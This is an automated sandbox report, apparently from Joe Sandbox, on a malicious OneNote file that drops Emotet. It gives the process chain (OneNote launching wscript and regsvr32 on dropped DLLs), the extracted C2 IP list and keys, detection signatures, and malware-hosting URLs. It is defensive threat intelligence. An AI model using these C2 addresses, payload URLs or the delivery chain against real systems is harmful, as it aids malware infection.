Edit tour

Windows Analysis Report
Insight_Medical_Publishing_4.one

Overview

General Information

Sample Name:	Insight_Medical_Publishing_4.one
Analysis ID:	828494
MD5:	0c521381f0d5fe36e9dbf63e9012067d
SHA1:	29d169b2eca785dc579651b7e1ed2cb9ad854f37
SHA256:	332107452ecfb3cab8af719978c4c2acc8325219b57eceb77fc2ea77529ff92d
Tags:	one
Infos:

Detection

Emotet

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Malicious OneNote

Yara detected Emotet

System process connects to network (likely due to code injection or exploit)

Sigma detected: Run temp file via regsvr32

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Snort IDS alert for network traffic

C2 URLs / IPs found in malware configuration

Hides that the sample has been downloaded from the Internet (zone.identifier)

Document exploit detected (process start blacklist hit)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Internet Provider seen in connection with other malware

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Stores files to the Windows start menu directory

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Drops PE files

Tries to load missing DLLs

Uses a known web browser user agent for HTTP communication

Drops PE files to the windows directory (C:\Windows)

Detected TCP or UDP traffic on non-standard ports

Connects to several IPs in different countries

Creates a start menu entry (Start Menu\Programs\Startup)

Registers a DLL

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Found WSH timer for Javascript or VBS script (likely evasive script)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

ONENOTE.EXE (PID: 4884 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE" "C:\Users\user\Desktop\Insight_Medical_Publishing_4.one MD5: 8D7E99CB358318E1F38803C9E6B67867)

wscript.exe (PID: 6124 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf" MD5: 7075DD7B9BE8807FCA93ACD86F724884)

regsvr32.exe (PID: 1048 cmdline: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll MD5: 426E7499F6A7346F0410DEAD0805586B)

regsvr32.exe (PID: 604 cmdline: "C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

regsvr32.exe (PID: 5084 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\BqnZyHskpeTuo\PjkJxfQvhUP.dll" MD5: D78B75FC68247E8A63ACBA846182740E)

ONENOTEM.EXE (PID: 912 cmdline: /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)

ONENOTEM.EXE (PID: 3920 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\ONENOTEM.EXE" /tsr MD5: DBCFA6F25577339B877D2305CAD3DEC3)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Emotet	While Emotet historically was a banking malware organized in a botnet, nowadays Emotet is mostly seen as infrastructure as a service for content delivery. For example, since mid 2018 it is used by Trickbot for installs, which may also lead to ransomware attacks using Ryuk, a combination observed several times against high-profile targets.It is always stealing information from victims but what the criminal gang behind it did, was to open up another business channel by selling their infrastructure delivering additional malicious software. From malware analysts it has been classified into epochs depending on command and control, payloads, and delivery solutions which change over time.Emotet had been taken down by authorities in January 2021, though it appears to have sprung back to life in November 2021.	GOLD CABIN MUMMY SPIDER Mealybug	http://blog.fortinet.com/2017/05/03/deep-analysis-of-new-emotet-variant-part-1 http://blog.trendmicro.com/trendlabs-security-intelligence/emotet-returns-starts-spreading-via-spam-botnet/ http://ropgadget.com/posts/defensive_pcres.html https://adalogics.com/blog/the-state-of-advanced-code-injections https://asec.ahnlab.com/en/33600/	https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet

Malware Configuration

Threatname: Emotet

{"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5KJfivQAlAJQ=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2QJe6vQAtAJA="]}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Insight_Medical_Publishing_4.one	JoeSecurity_MalOneNote	Yara detected Malicious OneNote	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\Desktop\Insight_Medical_Publishing_4.one	JoeSecurity_MalOneNote	Yara detected Malicious OneNote	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000D.00000002.571771558.0000000001041000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000003.350591261.00000000056C7000.00000004.00000020.00020000.00000000.sdmp	webshell_asp_obfuscated	ASP webshell obfuscated	Arnim Rupp	0x238a:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8 0x542:$jsp4: public 0xf7a:$jsp4: public 0x15ba:$jsp4: public 0x2c2a:$jsp4: public 0xc34:$asp_payload11: wscript.shell 0x28e4:$asp_payload11: wscript.shell 0x306:$asp_multi_payload_one1: createobject 0x63e:$asp_multi_payload_one1: createobject 0x81c:$asp_multi_payload_one1: createobject 0x90a:$asp_multi_payload_one1: createobject 0x982:$asp_multi_payload_one1: createobject 0x9dc:$asp_multi_payload_one1: createobject 0xc18:$asp_multi_payload_one1: createobject 0x137e:$asp_multi_payload_one1: createobject 0x16b6:$asp_multi_payload_one1: createobject 0x24cc:$asp_multi_payload_one1: createobject 0x25ba:$asp_multi_payload_one1: createobject 0x2632:$asp_multi_payload_one1: createobject 0x268c:$asp_multi_payload_one1: createobject 0x28c8:$asp_multi_payload_one1: createobject
0000000A.00000003.350591261.00000000056C7000.00000004.00000020.00020000.00000000.sdmp	WEBSHELL_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0xae6:$asp_gen_obf1: "+" 0xb16:$asp_gen_obf1: "+" 0x2796:$asp_gen_obf1: "+" 0x27c6:$asp_gen_obf1: "+" 0x238a:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8 0x542:$jsp4: public 0xf7a:$jsp4: public 0x15ba:$jsp4: public 0x2c2a:$jsp4: public 0xb0:$asp_input1: request 0xf2:$asp_input1: request 0x208:$asp_input1: request 0x8fa:$asp_input1: request 0x1128:$asp_input1: request 0x116a:$asp_input1: request 0x1280:$asp_input1: request 0x25aa:$asp_input1: request 0x2dd8:$asp_input1: request 0x2e1a:$asp_input1: request 0x2f30:$asp_input1: request 0xc34:$asp_payload11: wscript.shell
0000000D.00000002.572082302.000000000107B000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Emotet_3	Yara detected Emotet	Joe Security
0000000C.00000002.327461788.0000000000590000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000D.00000002.571413418.0000000001010000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000C.00000002.327486572.00000000005C1000.00000020.00001000.00020000.00000000.sdmp	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
0000000A.00000003.340162075.00000000056C4000.00000004.00000020.00020000.00000000.sdmp	webshell_asp_obfuscated	ASP webshell obfuscated	Arnim Rupp	0x538a:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8 0x2f02:$jsp4: public 0x3542:$jsp4: public 0x3f7a:$jsp4: public 0x45ba:$jsp4: public 0x5c2a:$jsp4: public 0x626a:$jsp4: public 0x6b62:$jsp4: public 0x71a2:$jsp4: public 0x8c12:$jsp4: public 0x9252:$jsp4: public 0x9c7a:$jsp4: public 0xa2ba:$jsp4: public 0x2bbc:$asp_payload11: wscript.shell 0x3c34:$asp_payload11: wscript.shell 0x58e4:$asp_payload11: wscript.shell 0x681c:$asp_payload11: wscript.shell 0x88cc:$asp_payload11: wscript.shell 0x9934:$asp_payload11: wscript.shell 0x27a4:$asp_multi_payload_one1: createobject 0x2892:$asp_multi_payload_one1: createobject
0000000A.00000003.340162075.00000000056C4000.00000004.00000020.00020000.00000000.sdmp	WEBSHELL_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x2a6e:$asp_gen_obf1: "+" 0x2a9e:$asp_gen_obf1: "+" 0x3ae6:$asp_gen_obf1: "+" 0x3b16:$asp_gen_obf1: "+" 0x5796:$asp_gen_obf1: "+" 0x57c6:$asp_gen_obf1: "+" 0x66ce:$asp_gen_obf1: "+" 0x66fe:$asp_gen_obf1: "+" 0x877e:$asp_gen_obf1: "+" 0x87ae:$asp_gen_obf1: "+" 0x97e6:$asp_gen_obf1: "+" 0x9816:$asp_gen_obf1: "+" 0x538a:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8 0x2f02:$jsp4: public 0x3542:$jsp4: public 0x3f7a:$jsp4: public 0x45ba:$jsp4: public 0x5c2a:$jsp4: public 0x626a:$jsp4: public 0x6b62:$jsp4: public 0x71a2:$jsp4: public
0000000A.00000003.339776726.00000000056BD000.00000004.00000020.00020000.00000000.sdmp	webshell_asp_obfuscated	ASP webshell obfuscated	Arnim Rupp	0xc38a:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8 0x9f02:$jsp4: public 0xa542:$jsp4: public 0xaf7a:$jsp4: public 0xb5ba:$jsp4: public 0xcc2a:$jsp4: public 0xd26a:$jsp4: public 0xdb62:$jsp4: public 0xe1a2:$jsp4: public 0xfc12:$jsp4: public 0x10252:$jsp4: public 0x10c7a:$jsp4: public 0x112ba:$jsp4: public 0x9bbc:$asp_payload11: wscript.shell 0xac34:$asp_payload11: wscript.shell 0xc8e4:$asp_payload11: wscript.shell 0xd81c:$asp_payload11: wscript.shell 0xf8cc:$asp_payload11: wscript.shell 0x10934:$asp_payload11: wscript.shell 0x97a4:$asp_multi_payload_one1: createobject 0x9892:$asp_multi_payload_one1: createobject
0000000A.00000003.339776726.00000000056BD000.00000004.00000020.00020000.00000000.sdmp	WEBSHELL_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x9a6e:$asp_gen_obf1: "+" 0x9a9e:$asp_gen_obf1: "+" 0xaae6:$asp_gen_obf1: "+" 0xab16:$asp_gen_obf1: "+" 0xc796:$asp_gen_obf1: "+" 0xc7c6:$asp_gen_obf1: "+" 0xd6ce:$asp_gen_obf1: "+" 0xd6fe:$asp_gen_obf1: "+" 0xf77e:$asp_gen_obf1: "+" 0xf7ae:$asp_gen_obf1: "+" 0x107e6:$asp_gen_obf1: "+" 0x10816:$asp_gen_obf1: "+" 0xc38a:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8 0x9f02:$jsp4: public 0xa542:$jsp4: public 0xaf7a:$jsp4: public 0xb5ba:$jsp4: public 0xcc2a:$jsp4: public 0xd26a:$jsp4: public 0xdb62:$jsp4: public 0xe1a2:$jsp4: public
0000000A.00000002.354227381.00000000056C8000.00000004.00000020.00020000.00000000.sdmp	WEBSHELL_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x1796:$asp_gen_obf1: "+" 0x17c6:$asp_gen_obf1: "+" 0x138a:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8 0x5ba:$jsp4: public 0x1c2a:$jsp4: public 0x128:$asp_input1: request 0x16a:$asp_input1: request 0x280:$asp_input1: request 0x15aa:$asp_input1: request 0x1dd8:$asp_input1: request 0x1e1a:$asp_input1: request 0x1f30:$asp_input1: request 0x18e4:$asp_payload11: wscript.shell 0x37e:$asp_multi_payload_one1: createobject 0x6b6:$asp_multi_payload_one1: createobject 0x14cc:$asp_multi_payload_one1: createobject 0x15ba:$asp_multi_payload_one1: createobject 0x1632:$asp_multi_payload_one1: createobject 0x168c:$asp_multi_payload_one1: createobject 0x18c8:$asp_multi_payload_one1: createobject 0x65c:$asp_multi_payload_one3: .run
0000000A.00000003.341613942.00000000056C4000.00000004.00000020.00020000.00000000.sdmp	webshell_asp_obfuscated	ASP webshell obfuscated	Arnim Rupp	0x538a:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8 0x2f02:$jsp4: public 0x3542:$jsp4: public 0x3f7a:$jsp4: public 0x45ba:$jsp4: public 0x5c2a:$jsp4: public 0x626a:$jsp4: public 0x6b62:$jsp4: public 0x71a2:$jsp4: public 0x8c12:$jsp4: public 0x9252:$jsp4: public 0x9c7a:$jsp4: public 0xa2ba:$jsp4: public 0x2bbc:$asp_payload11: wscript.shell 0x3c34:$asp_payload11: wscript.shell 0x58e4:$asp_payload11: wscript.shell 0x681c:$asp_payload11: wscript.shell 0x88cc:$asp_payload11: wscript.shell 0x9934:$asp_payload11: wscript.shell 0x27a4:$asp_multi_payload_one1: createobject 0x2892:$asp_multi_payload_one1: createobject
0000000A.00000003.341613942.00000000056C4000.00000004.00000020.00020000.00000000.sdmp	WEBSHELL_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x2a6e:$asp_gen_obf1: "+" 0x2a9e:$asp_gen_obf1: "+" 0x3ae6:$asp_gen_obf1: "+" 0x3b16:$asp_gen_obf1: "+" 0x5796:$asp_gen_obf1: "+" 0x57c6:$asp_gen_obf1: "+" 0x66ce:$asp_gen_obf1: "+" 0x66fe:$asp_gen_obf1: "+" 0x877e:$asp_gen_obf1: "+" 0x87ae:$asp_gen_obf1: "+" 0x97e6:$asp_gen_obf1: "+" 0x9816:$asp_gen_obf1: "+" 0x538a:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8 0x2f02:$jsp4: public 0x3542:$jsp4: public 0x3f7a:$jsp4: public 0x45ba:$jsp4: public 0x5c2a:$jsp4: public 0x626a:$jsp4: public 0x6b62:$jsp4: public 0x71a2:$jsp4: public
0000000A.00000003.349899661.000000000588F000.00000004.00000020.00020000.00000000.sdmp	WEBSHELL_asp_generic	Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file	Arnim Rupp	0x11dc6:$asp_gen_obf1: "+" 0x11df6:$asp_gen_obf1: "+" 0x12e0e:$asp_gen_obf1: "+" 0x12e3e:$asp_gen_obf1: "+" 0x98b2:$tagasp_classid1: 72C24DD5-D70A-438B-8A42-98424B88AFB8 0x3d2:$jsp4: public 0xa12:$jsp4: public 0x1225a:$jsp4: public 0x1289a:$jsp4: public 0x132a2:$jsp4: public 0x138e2:$jsp4: public 0x580:$asp_input1: request 0x5c2:$asp_input1: request 0x6d8:$asp_input1: request 0x11bda:$asp_input1: request 0x12408:$asp_input1: request 0x1244a:$asp_input1: request 0x12560:$asp_input1: request 0x12c22:$asp_input1: request 0x13450:$asp_input1: request 0x13492:$asp_input1: request
Click to see the 10 entries

Unpacked PEs

Source	Rule	Description	Author
13.2.regsvr32.exe.1010000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
13.2.regsvr32.exe.1010000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.regsvr32.exe.590000.0.raw.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security
12.2.regsvr32.exe.590000.0.unpack	JoeSecurity_Emotet_1	Yara detected Emotet	Joe Security

Sigma Signatures

Malware Analysis System Evasion

Sigma detected: Run temp file via regsvr32

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll, CommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Local\Temp\click.wsf", ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 6124, ParentProcessName: wscript.exe, ProcessCommandLine: C:\Windows\System32\regsvr32.exe" "C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll, ProcessId: 1048, ProcessName: regsvr32.exe

Snort Signatures

ET CNC Feodo Tracker Reported CnC Server TCP group 2 - Source IP: 192.168.2.7 - Destination IP: 104.168.155.143

Timestamp:	192.168.2.7104.168.155.1434971580802404302 03/17/23-09:13:09.645395
SID:	2404302
Source Port:	49715
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 16 - Source IP: 192.168.2.7 - Destination IP: 66.228.32.31

Timestamp:	192.168.2.766.228.32.314970770802404330 03/17/23-09:12:39.846393
SID:	2404330
Source Port:	49707
Destination Port:	7080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 23 - Source IP: 192.168.2.7 - Destination IP: 91.121.146.47

Timestamp:	192.168.2.791.121.146.474970580802404344 03/17/23-09:12:33.263560
SID:	2404344
Source Port:	49705
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 5 - Source IP: 192.168.2.7 - Destination IP: 167.172.199.165

Timestamp:	192.168.2.7167.172.199.1654971080802404308 03/17/23-09:12:57.142531
SID:	2404308
Source Port:	49710
Destination Port:	8080
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CNC Feodo Tracker Reported CnC Server TCP group 7 - Source IP: 192.168.2.7 - Destination IP: 182.162.143.56

Timestamp:	192.168.2.7182.162.143.56497084432404312 03/17/23-09:12:45.141736
SID:	2404312
Source Port:	49708
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Insight_Medical_Publishing_4.one	ReversingLabs: Detection: 33%
Source: Insight_Medical_Publishing_4.one	Virustotal: Detection: 40%			Perma Link

Antivirus detection for URL or domain

Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/i	Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/windic2	Avira URL Cloud: Label: malware
Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/w11798	Avira URL Cloud: Label: malware
Source: https://66.228.32.31:7080/f	Avira URL Cloud: Label: malware
Source: https://104.168.155.143:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/s	Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8	Avira URL Cloud: Label: malware
Source: https://159.89.202.34/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	Avira URL Cloud: Label: malware
Source: http://ozmeydan.com/cekici/9/jn7	Avira URL Cloud: Label: malware
Source: https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv//	Avira URL Cloud: Label: malware
Source: https://159.65.88.10:8080/xJ	Avira URL Cloud: Label: malware
Source: https://91.121.146.47:8080/Y	Avira URL Cloud: Label: malware
Source: https://104.168.155.143:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/A4	Avira URL Cloud: Label: malware
Source: https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/=	Avira URL Cloud: Label: malware
Source: https://66.228.32.31:7080/	Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/vM	Avira URL Cloud: Label: malware
Source: http://softwareulike.com/cWIYxWMPkK/	Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/	Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/ocal	Avira URL Cloud: Label: malware
Source: http://ozmeydan.com/cekici/9/	Avira URL Cloud: Label: malware
Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/wM	Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/tM	Avira URL Cloud: Label: malware
Source: https://www.gomespontes.com.br/logs/pd/	Avira URL Cloud: Label: malware
Source: https://159.89.202.34/cH	Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/uM	Avira URL Cloud: Label: malware
Source: https://91.121.146.47:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	Avira URL Cloud: Label: malware
Source: https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/%4	Avira URL Cloud: Label: malware
Source: https://159.65.88.10:8080/	Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/	Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/0	Avira URL Cloud: Label: malware
Source: https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/	Avira URL Cloud: Label: malware
Source: https://159.65.88.10:8080/hJ	Avira URL Cloud: Label: malware
Source: https://91.121.146.47:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/=	Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/R	Avira URL Cloud: Label: malware
Source: http://softwareulike.com/cWIYxWMPkK/yM	Avira URL Cloud: Label: malware
Source: https://182.162.143.56/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/j2	Avira URL Cloud: Label: malware
Source: https://163.44.196.120:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/H	Avira URL Cloud: Label: malware
Source: http://ozmeydan.com/cekici/9/xM	Avira URL Cloud: Label: malware
Source: https://163.44.196.120:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/	Avira URL Cloud: Label: malware
Source: http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/zM	Avira URL Cloud: Label: malware
Source: https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/	Avira URL Cloud: Label: malware
Source: https://penshorn.org/admin/Ses8712iGR8du/o	Avira URL Cloud: Label: malware
Source: https://159.65.88.10:8080/wviitvvypaw/exnwmeb/fqgitydelxiavmv/Xa4	Avira URL Cloud: Label: malware
Source: https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/temobj	Avira URL Cloud: Label: malware

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\rad16F69.tmp.dll	ReversingLabs: Detection: 58%
Source: C:\Windows\System32\BqnZyHskpeTuo\PjkJxfQvhUP.dll (copy)	ReversingLabs: Detection: 58%

Source: 0000000D.00000002.572082302.000000000107B000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Emotet {"C2 list": ["91.121.146.47:8080", "66.228.32.31:7080", "182.162.143.56:443", "187.63.160.88:80", "167.172.199.165:8080", "164.90.222.65:443", "104.168.155.143:8080", "163.44.196.120:8080", "160.16.142.56:8080", "159.89.202.34:443", "159.65.88.10:8080", "186.194.240.217:443", "149.56.131.28:8080", "72.15.201.15:8080", "1.234.2.232:8080", "82.223.21.224:8080", "206.189.28.199:8080", "169.57.156.166:8080", "107.170.39.149:8080", "103.43.75.120:443", "91.207.28.33:8080", "213.239.212.5:443", "45.235.8.30:8080", "119.59.103.152:8080", "164.68.99.3:8080", "95.217.221.146:8080", "153.126.146.25:7080", "197.242.150.244:8080", "202.129.205.3:8080", "103.132.242.26:8080", "139.59.126.41:443", "110.232.117.186:8080", "183.111.227.137:8080", "5.135.159.50:443", "201.94.166.162:443", "103.75.201.2:443", "79.137.35.198:8080", "172.105.226.75:8080", "94.23.45.86:4143", "115.68.227.76:8080", "153.92.5.27:8080", "167.172.253.162:8080", "188.44.20.25:443", "147.139.166.154:8080", "129.232.188.93:443", "173.212.193.249:8080", "185.4.135.165:8080", "45.176.232.124:443"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5KJfivQAlAJQ=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2QJe6vQAtAJA="]}

Source: unknown	HTTPS traffic detected: 203.26.41.131:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.7:49708 version: TLS 1.2

Source: C:\Windows\System32\regsvr32.exe

Code function: 12_2_0000000180008D28 FindFirstFileExW,

12_2_0000000180008D28

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE

Process created: C:\Windows\SysWOW64\wscript.exe

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe	Network Connect: 159.65.88.10 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 164.90.222.65 443	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Network Connect: 203.26.41.131 443	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Domain query: penshorn.org
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 66.228.32.31 7080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 187.63.160.88 80	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 104.168.155.143 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 159.89.202.34 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 91.121.146.47 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 160.16.142.56 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 182.162.143.56 443	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 167.172.199.165 8080	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Network Connect: 163.44.196.120 8080	Jump to behavior

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2404312 ET CNC Feodo Tracker Reported CnC Server TCP group 7 192.168.2.7:49708 -> 182.162.143.56:443
Source: Traffic	Snort IDS: 2404344 ET CNC Feodo Tracker Reported CnC Server TCP group 23 192.168.2.7:49705 -> 91.121.146.47:8080
Source: Traffic	Snort IDS: 2404330 ET CNC Feodo Tracker Reported CnC Server TCP group 16 192.168.2.7:49707 -> 66.228.32.31:7080
Source: Traffic	Snort IDS: 2404308 ET CNC Feodo Tracker Reported CnC Server TCP group 5 192.168.2.7:49710 -> 167.172.199.165:8080
Source: Traffic	Snort IDS: 2404302 ET CNC Feodo Tracker Reported CnC Server TCP group 2 192.168.2.7:49715 -> 104.168.155.143:8080

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	IPs: 91.121.146.47:8080
Source: Malware configuration extractor	IPs: 66.228.32.31:7080
Source: Malware configuration extractor	IPs: 182.162.143.56:443
Source: Malware configuration extractor	IPs: 187.63.160.88:80
Source: Malware configuration extractor	IPs: 167.172.199.165:8080
Source: Malware configuration extractor	IPs: 164.90.222.65:443
Source: Malware configuration extractor	IPs: 104.168.155.143:8080
Source: Malware configuration extractor	IPs: 163.44.196.120:8080
Source: Malware configuration extractor	IPs: 160.16.142.56:8080
Source: Malware configuration extractor	IPs: 159.89.202.34:443
Source: Malware configuration extractor	IPs: 159.65.88.10:8080
Source: Malware configuration extractor	IPs: 186.194.240.217:443
Source: Malware configuration extractor	IPs: 149.56.131.28:8080
Source: Malware configuration extractor	IPs: 72.15.201.15:8080
Source: Malware configuration extractor	IPs: 1.234.2.232:8080
Source: Malware configuration extractor	IPs: 82.223.21.224:8080
Source: Malware configuration extractor	IPs: 206.189.28.199:8080
